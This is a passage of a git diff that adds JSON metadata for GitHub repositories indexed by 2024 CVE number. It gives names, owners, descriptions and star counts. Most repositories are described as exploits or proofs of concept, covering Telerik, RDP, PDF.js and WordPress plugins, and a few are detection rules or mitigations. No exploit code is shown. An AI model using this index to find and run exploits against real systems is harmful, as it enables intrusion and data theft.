"CVE-2024-4358", + "full_name": "gh-ost00\/CVE-2024-4358", + "owner": { + "login": "gh-ost00", + "id": 153366162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153366162?v=4", + "html_url": "https:\/\/github.com\/gh-ost00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gh-ost00\/CVE-2024-4358", + "description": "Telerik Report Server deserialization and authentication bypass exploit chain for CVE-2024-4358\/CVE-2024-1800", + "fork": false, + "created_at": "2024-08-24T10:09:09Z", + "updated_at": "2024-10-15T07:21:11Z", + "pushed_at": "2024-08-24T10:48:43Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-43582.json b/2024/CVE-2024-43582.json new file mode 100644 index 0000000000..009e2bd100 --- /dev/null +++ b/2024/CVE-2024-43582.json @@ -0,0 +1,33 @@ +[ + { + "id": 870100127, + "name": "CVE-2024-43582-RCE", + "full_name": "jinxongwi\/CVE-2024-43582-RCE", + "owner": { + "login": "jinxongwi", + "id": 184388726, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/184388726?v=4", + "html_url": "https:\/\/github.com\/jinxongwi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jinxongwi\/CVE-2024-43582-RCE", + "description": "Metasploit Module for CVE-2024-43582 RPC Remote Desktop Service crititcal RCE", + "fork": false, + "created_at": "2024-10-09T12:50:24Z", + "updated_at": "2024-10-17T12:14:17Z", + "pushed_at": "2024-10-09T13:19:29Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4367.json b/2024/CVE-2024-4367.json new file mode 100644 index 0000000000..1497556ae8 --- /dev/null +++ b/2024/CVE-2024-4367.json @@ -0,0 +1,328 @@ +[ + { + "id": 803221600, + "name": "CVE-2024-4367-PoC", + "full_name": "LOURC0D3\/CVE-2024-4367-PoC", + "owner": { + "login": "LOURC0D3", + "id": 83567597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83567597?v=4", + "html_url": "https:\/\/github.com\/LOURC0D3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LOURC0D3\/CVE-2024-4367-PoC", + "description": "CVE-2024-4367 & CVE-2024-34342 Proof of Concept", + "fork": false, + "created_at": "2024-05-20T10:02:23Z", + "updated_at": "2024-11-21T01:13:36Z", + "pushed_at": "2024-06-07T03:28:00Z", + "stargazers_count": 136, + "watchers_count": 136, + "has_discussions": false, + "forks_count": 19, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 19, + "watchers": 136, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 803533618, + "name": "CVE-2024-4367-POC", + "full_name": "s4vvysec\/CVE-2024-4367-POC", + "owner": { + "login": "s4vvysec", + "id": 153960960, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153960960?v=4", + "html_url": "https:\/\/github.com\/s4vvysec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s4vvysec\/CVE-2024-4367-POC", + "description": "CVE-2024-4367 arbitrary js execution in pdf js", + "fork": false, + "created_at": "2024-05-20T22:56:10Z", + "updated_at": "2024-11-20T16:30:47Z", + "pushed_at": "2024-05-20T23:09:43Z", + "stargazers_count": 44, + "watchers_count": 44, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 44, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804506786, + "name": "detect-cve-2024-4367", + "full_name": "spaceraccoon\/detect-cve-2024-4367", + "owner": { + "login": "spaceraccoon", + "id": 18413849, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18413849?v=4", + "html_url": "https:\/\/github.com\/spaceraccoon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/spaceraccoon\/detect-cve-2024-4367", + "description": "YARA detection rule for CVE-2024-4367 arbitrary javascript execution in PDF.js", + "fork": false, + "created_at": "2024-05-22T18:05:47Z", + "updated_at": "2024-09-07T16:55:08Z", + "pushed_at": "2024-05-27T03:06:09Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804608693, + "name": "pdfjs-vuln-demo", + "full_name": "clarkio\/pdfjs-vuln-demo", + "owner": { + "login": "clarkio", + "id": 6265396, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6265396?v=4", + "html_url": "https:\/\/github.com\/clarkio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/clarkio\/pdfjs-vuln-demo", + "description": "This project is intended to serve as a proof of concept to demonstrate exploiting the vulnerability in the PDF.js (pdfjs-dist) library reported in CVE-2024-4367", + "fork": false, + "created_at": "2024-05-22T23:18:20Z", + "updated_at": "2024-08-17T19:52:12Z", + "pushed_at": "2024-11-10T04:17:31Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "application-security", + "appsec", + "astro", + "astrojs", + "pdf", + "pdfjs", + "pdfjs-dist", + "react", + "security", + "svelte", + "vue", + "vuejs", + "web" + ], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804747982, + "name": "pdfjs_disable_eval", + "full_name": "avalahEE\/pdfjs_disable_eval", + "owner": { + "login": "avalahEE", + "id": 56412727, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56412727?v=4", + "html_url": "https:\/\/github.com\/avalahEE", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/avalahEE\/pdfjs_disable_eval", + "description": "CVE-2024-4367 mitigation for Odoo 14.0", + "fork": false, + "created_at": "2024-05-23T07:34:15Z", + "updated_at": "2024-05-27T08:25:46Z", + "pushed_at": "2024-05-27T07:23:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "odoo14" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 814724272, + "name": "cve-2024-4367-PoC-fixed", + "full_name": "Zombie-Kaiser\/cve-2024-4367-PoC-fixed", + "owner": { + "login": "Zombie-Kaiser", + "id": 141570642, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141570642?v=4", + "html_url": "https:\/\/github.com\/Zombie-Kaiser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zombie-Kaiser\/cve-2024-4367-PoC-fixed", + "description": "PDF.js是由Mozilla维护的基于JavaScript的PDF查看器。此漏洞允许攻击者在打开恶意 PDF 文件后立即执行任意 JavaScript 代码。这会影响所有 Firefox 用户 (<126),因为 Firefox 使用 PDF.js 来显示 PDF 文件,但也严重影响了许多基于 Web 和 Electron 的应用程序,这些应用程序(间接)使用 PDF.js 进行预览功能。", + "fork": false, + "created_at": "2024-06-13T15:14:47Z", + "updated_at": "2024-11-04T10:45:50Z", + "pushed_at": "2024-06-13T15:19:57Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 816264581, + "name": "pdfjs-vuln-demo", + "full_name": "snyk-labs\/pdfjs-vuln-demo", + "owner": { + "login": "snyk-labs", + "id": 47793611, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47793611?v=4", + "html_url": "https:\/\/github.com\/snyk-labs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/snyk-labs\/pdfjs-vuln-demo", + "description": "This project is intended to serve as a proof of concept to demonstrate exploiting the vulnerability in the PDF.js (pdfjs-dist) library reported in CVE-2024-4367", + "fork": false, + "created_at": "2024-06-17T11:39:41Z", + "updated_at": "2024-11-25T04:23:00Z", + "pushed_at": "2024-06-20T13:40:31Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 817529952, + "name": "PDFernetRemotelo", + "full_name": "UnHackerEnCapital\/PDFernetRemotelo", + "owner": { + "login": "UnHackerEnCapital", + "id": 173314584, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173314584?v=4", + "html_url": "https:\/\/github.com\/UnHackerEnCapital", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UnHackerEnCapital\/PDFernetRemotelo", + "description": "PoC - Prueba de Concepto de CVE-2024-4367 en conjunto al CVE-2023-38831 en un solo Script", + "fork": false, + "created_at": "2024-06-19T23:23:07Z", + "updated_at": "2024-11-20T16:30:50Z", + "pushed_at": "2024-06-20T00:02:49Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 852283076, + "name": "CVE-2024-4367-Analysis", + "full_name": "Masamuneee\/CVE-2024-4367-Analysis", + "owner": { + "login": "Masamuneee", + "id": 125840508, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125840508?v=4", + "html_url": "https:\/\/github.com\/Masamuneee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Masamuneee\/CVE-2024-4367-Analysis", + "description": null, + "fork": false, + "created_at": "2024-09-04T14:43:33Z", + "updated_at": "2024-11-27T00:52:45Z", + "pushed_at": "2024-09-04T15:17:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 884449297, + "name": "CVE-2024-4367-pdf-sample", + "full_name": "pedrochalegre7\/CVE-2024-4367-pdf-sample", + "owner": { + "login": "pedrochalegre7", + "id": 101287325, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101287325?v=4", + "html_url": "https:\/\/github.com\/pedrochalegre7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pedrochalegre7\/CVE-2024-4367-pdf-sample", + "description": null, + "fork": false, + "created_at": "2024-11-06T19:15:38Z", + "updated_at": "2024-11-07T14:29:14Z", + "pushed_at": "2024-11-07T14:28:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-43917.json b/2024/CVE-2024-43917.json new file mode 100644 index 0000000000..454b0514d3 --- /dev/null +++ b/2024/CVE-2024-43917.json @@ -0,0 +1,33 @@ +[ + { + "id": 864780093, + "name": "CVE-2024-43917", + "full_name": "p33d\/CVE-2024-43917", + "owner": { + "login": "p33d", + "id": 123099747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123099747?v=4", + "html_url": "https:\/\/github.com\/p33d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p33d\/CVE-2024-43917", + "description": null, + "fork": false, + "created_at": "2024-09-29T06:23:35Z", + "updated_at": "2024-11-20T16:31:06Z", + "pushed_at": "2024-09-29T06:48:13Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-43918.json b/2024/CVE-2024-43918.json new file mode 100644 index 0000000000..eb5e7c41a2 --- /dev/null +++ b/2024/CVE-2024-43918.json @@ -0,0 +1,33 @@ +[ + { + "id": 862146506, + "name": "CVE-2024-43918", + "full_name": "KTN1990\/CVE-2024-43918", + "owner": { + "login": "KTN1990", + "id": 33407405, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33407405?v=4", + "html_url": "https:\/\/github.com\/KTN1990", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KTN1990\/CVE-2024-43918", + "description": "WBW Product Table Pro <= 1.9.4 - Unauthenticated Arbitrary SQL Execution to RCE", + "fork": false, + "created_at": "2024-09-24T05:50:03Z", + "updated_at": "2024-10-08T13:47:15Z", + "pushed_at": "2024-09-24T05:52:04Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-43919.json b/2024/CVE-2024-43919.json new file mode 100644 index 0000000000..604a3c44df --- /dev/null +++ b/2024/CVE-2024-43919.json @@ -0,0 +1,33 @@ +[ + { + "id": 892694266, + "name": "CVE-2024-43919", + "full_name": "RandomRobbieBF\/CVE-2024-43919", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-43919", + "description": "YARPP <= 5.30.10 - Missing Authorization", + "fork": false, + "created_at": "2024-11-22T15:42:39Z", + "updated_at": "2024-11-22T15:44:26Z", + "pushed_at": "2024-11-22T15:44:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-43965.json b/2024/CVE-2024-43965.json new file mode 100644 index 0000000000..8c9097663b --- /dev/null +++ b/2024/CVE-2024-43965.json @@ -0,0 +1,33 @@ +[ + { + "id": 872256938, + "name": "CVE-2024-43965", + "full_name": "RandomRobbieBF\/CVE-2024-43965", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-43965", + "description": "SendGrid for WordPress <= 1.4 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-10-14T05:58:17Z", + "updated_at": "2024-10-18T17:57:10Z", + "pushed_at": "2024-10-14T05:59:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-43998.json b/2024/CVE-2024-43998.json new file mode 100644 index 0000000000..490567d3a0 --- /dev/null +++ b/2024/CVE-2024-43998.json @@ -0,0 +1,33 @@ +[ + { + "id": 855090098, + "name": "CVE-2024-43998", + "full_name": "RandomRobbieBF\/CVE-2024-43998", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-43998", + "description": "Blogpoet <= 1.0.2 - Missing Authorization via blogpoet_install_and_activate_plugins()", + "fork": false, + "created_at": "2024-09-10T09:38:20Z", + "updated_at": "2024-10-18T17:57:40Z", + "pushed_at": "2024-09-10T09:45:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44000.json b/2024/CVE-2024-44000.json new file mode 100644 index 0000000000..ecf09198b1 --- /dev/null +++ b/2024/CVE-2024-44000.json @@ -0,0 +1,126 @@ +[ + { + "id": 853128126, + "name": "CVE-2024-44000-LiteSpeed-Cache", + "full_name": "absholi7ly\/CVE-2024-44000-LiteSpeed-Cache", + "owner": { + "login": "absholi7ly", + "id": 72062217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72062217?v=4", + "html_url": "https:\/\/github.com\/absholi7ly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/absholi7ly\/CVE-2024-44000-LiteSpeed-Cache", + "description": "CVE-2024-44000 is a vulnerability in the LiteSpeed Cache plugin, a popular WordPress plugin. This vulnerability affects session management in LiteSpeed Cache, allowing attackers to gain unauthorized access to sensitive data.", + "fork": false, + "created_at": "2024-09-06T03:38:13Z", + "updated_at": "2024-11-20T16:31:03Z", + "pushed_at": "2024-09-06T03:54:52Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 853354116, + "name": "CVE-2024-44000", + "full_name": "gbrsh\/CVE-2024-44000", + "owner": { + "login": "gbrsh", + "id": 36970331, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36970331?v=4", + "html_url": "https:\/\/github.com\/gbrsh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gbrsh\/CVE-2024-44000", + "description": "LiteSpeed Unauthorized Account Takeover", + "fork": false, + "created_at": "2024-09-06T13:43:30Z", + "updated_at": "2024-09-06T13:46:53Z", + "pushed_at": "2024-09-06T13:46:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 858218268, + "name": "CVE-2024-44000-LiteSpeed-Cache", + "full_name": "ifqygazhar\/CVE-2024-44000-LiteSpeed-Cache", + "owner": { + "login": "ifqygazhar", + "id": 82558488, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82558488?v=4", + "html_url": "https:\/\/github.com\/ifqygazhar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ifqygazhar\/CVE-2024-44000-LiteSpeed-Cache", + "description": "CVE-2024-44000-LiteSpeed-Cache", + "fork": false, + "created_at": "2024-09-16T14:13:52Z", + "updated_at": "2024-10-30T09:53:59Z", + "pushed_at": "2024-09-16T14:27:33Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 870756822, + "name": "CVE-2024-44000", + "full_name": "geniuszlyy\/CVE-2024-44000", + "owner": { + "login": "geniuszlyy", + "id": 137893386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137893386?v=4", + "html_url": "https:\/\/github.com\/geniuszlyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geniuszlyy\/CVE-2024-44000", + "description": "is a PoC tool designed to exploit insecurely exposed debug logs from WordPress sites and extract session cookies", + "fork": false, + "created_at": "2024-10-10T15:58:10Z", + "updated_at": "2024-10-21T08:14:54Z", + "pushed_at": "2024-10-10T15:59:51Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4406.json b/2024/CVE-2024-4406.json new file mode 100644 index 0000000000..93c124eba9 --- /dev/null +++ b/2024/CVE-2024-4406.json @@ -0,0 +1,33 @@ +[ + { + "id": 872352341, + "name": "cve-2024-4406-xiaomi13pro-exploit-files", + "full_name": "Yogehi\/cve-2024-4406-xiaomi13pro-exploit-files", + "owner": { + "login": "Yogehi", + "id": 10925671, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10925671?v=4", + "html_url": "https:\/\/github.com\/Yogehi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Yogehi\/cve-2024-4406-xiaomi13pro-exploit-files", + "description": "Files related to the Pwn2Own Toronto 2023 exploit against the Xiaomi 13 Pro.", + "fork": false, + "created_at": "2024-10-14T09:38:04Z", + "updated_at": "2024-11-25T06:46:01Z", + "pushed_at": "2024-10-14T09:43:53Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44083.json b/2024/CVE-2024-44083.json new file mode 100644 index 0000000000..0a01f7853f --- /dev/null +++ b/2024/CVE-2024-44083.json @@ -0,0 +1,33 @@ +[ + { + "id": 847298960, + "name": "CVE-2024-44083", + "full_name": "Azvanzed\/CVE-2024-44083", + "owner": { + "login": "Azvanzed", + "id": 107370797, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107370797?v=4", + "html_url": "https:\/\/github.com\/Azvanzed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Azvanzed\/CVE-2024-44083", + "description": "Makes IDA (most versions) to crash upon opening it. ", + "fork": false, + "created_at": "2024-08-25T12:33:14Z", + "updated_at": "2024-11-27T16:47:49Z", + "pushed_at": "2024-08-30T09:58:12Z", + "stargazers_count": 66, + "watchers_count": 66, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 66, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44193.json b/2024/CVE-2024-44193.json new file mode 100644 index 0000000000..d64490d557 --- /dev/null +++ b/2024/CVE-2024-44193.json @@ -0,0 +1,33 @@ +[ + { + "id": 867684338, + "name": "CVE-2024-44193", + "full_name": "mbog14\/CVE-2024-44193", + "owner": { + "login": "mbog14", + "id": 74453009, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74453009?v=4", + "html_url": "https:\/\/github.com\/mbog14", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbog14\/CVE-2024-44193", + "description": "Hacking Windows through iTunes  - Local Privilege Escalation 0-day", + "fork": false, + "created_at": "2024-10-04T14:20:15Z", + "updated_at": "2024-11-28T09:40:14Z", + "pushed_at": "2024-10-04T14:59:50Z", + "stargazers_count": 92, + "watchers_count": 92, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 92, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44258.json b/2024/CVE-2024-44258.json new file mode 100644 index 0000000000..4e305e73df --- /dev/null +++ b/2024/CVE-2024-44258.json @@ -0,0 +1,33 @@ +[ + { + "id": 880195363, + "name": "CVE-2024-44258", + "full_name": "ifpdz\/CVE-2024-44258", + "owner": { + "login": "ifpdz", + "id": 105882406, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105882406?v=4", + "html_url": "https:\/\/github.com\/ifpdz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ifpdz\/CVE-2024-44258", + "description": "CVE-2024-44258", + "fork": false, + "created_at": "2024-10-29T09:45:03Z", + "updated_at": "2024-11-27T20:00:28Z", + "pushed_at": "2024-11-02T19:20:44Z", + "stargazers_count": 58, + "watchers_count": 58, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 58, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44337.json b/2024/CVE-2024-44337.json new file mode 100644 index 0000000000..c2bf247f0d --- /dev/null +++ b/2024/CVE-2024-44337.json @@ -0,0 +1,33 @@ +[ + { + "id": 873032825, + "name": "CVE-2024-44337", + "full_name": "Brinmon\/CVE-2024-44337", + "owner": { + "login": "Brinmon", + "id": 135578945, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/135578945?v=4", + "html_url": "https:\/\/github.com\/Brinmon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Brinmon\/CVE-2024-44337", + "description": "CVE-2024-44337 POC The package `github.com\/gomarkdown\/markdown` is a Go library for parsing Markdown text and rendering as HTML. which allowed a remote attacker to cause a denial of service (DoS) condition by providing a tailor-made input that caused an infinite loop, causing the program to hang and consume resources indefinitely.", + "fork": false, + "created_at": "2024-10-15T13:44:20Z", + "updated_at": "2024-11-20T16:31:07Z", + "pushed_at": "2024-10-15T13:56:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44346.json b/2024/CVE-2024-44346.json new file mode 100644 index 0000000000..77667ea1a2 --- /dev/null +++ b/2024/CVE-2024-44346.json @@ -0,0 +1,71 @@ +[ + { + "id": 856852288, + "name": "CVE-2024-44346", + "full_name": "Shauryae1337\/CVE-2024-44346", + "owner": { + "login": "Shauryae1337", + "id": 83474425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83474425?v=4", + "html_url": "https:\/\/github.com\/Shauryae1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Shauryae1337\/CVE-2024-44346", + "description": "Public Disclosure", + "fork": false, + "created_at": "2024-09-13T10:27:23Z", + "updated_at": "2024-09-25T06:45:26Z", + "pushed_at": "2024-09-25T06:45:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 858902234, + "name": "CVE-2024-44346", + "full_name": "sahil3276\/CVE-2024-44346", + "owner": { + "login": "sahil3276", + "id": 105536637, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105536637?v=4", + "html_url": "https:\/\/github.com\/sahil3276", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sahil3276\/CVE-2024-44346", + "description": "Public Disclosure of CVE-2024-44346", + "fork": false, + "created_at": "2024-09-17T18:20:59Z", + "updated_at": "2024-09-17T18:29:29Z", + "pushed_at": "2024-09-17T18:22:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "advisory", + "cve", + "cve-2024-44346", + "disclosure", + "public", + "sahil3276" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44349.json b/2024/CVE-2024-44349.json new file mode 100644 index 0000000000..9192fe181f --- /dev/null +++ b/2024/CVE-2024-44349.json @@ -0,0 +1,33 @@ +[ + { + "id": 834035076, + "name": "PoC-CVE-2024-44349", + "full_name": "AndreaF17\/PoC-CVE-2024-44349", + "owner": { + "login": "AndreaF17", + "id": 31658778, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31658778?v=4", + "html_url": "https:\/\/github.com\/AndreaF17", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AndreaF17\/PoC-CVE-2024-44349", + "description": null, + "fork": false, + "created_at": "2024-07-26T09:24:37Z", + "updated_at": "2024-11-23T18:03:41Z", + "pushed_at": "2024-10-07T14:00:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4439.json b/2024/CVE-2024-4439.json new file mode 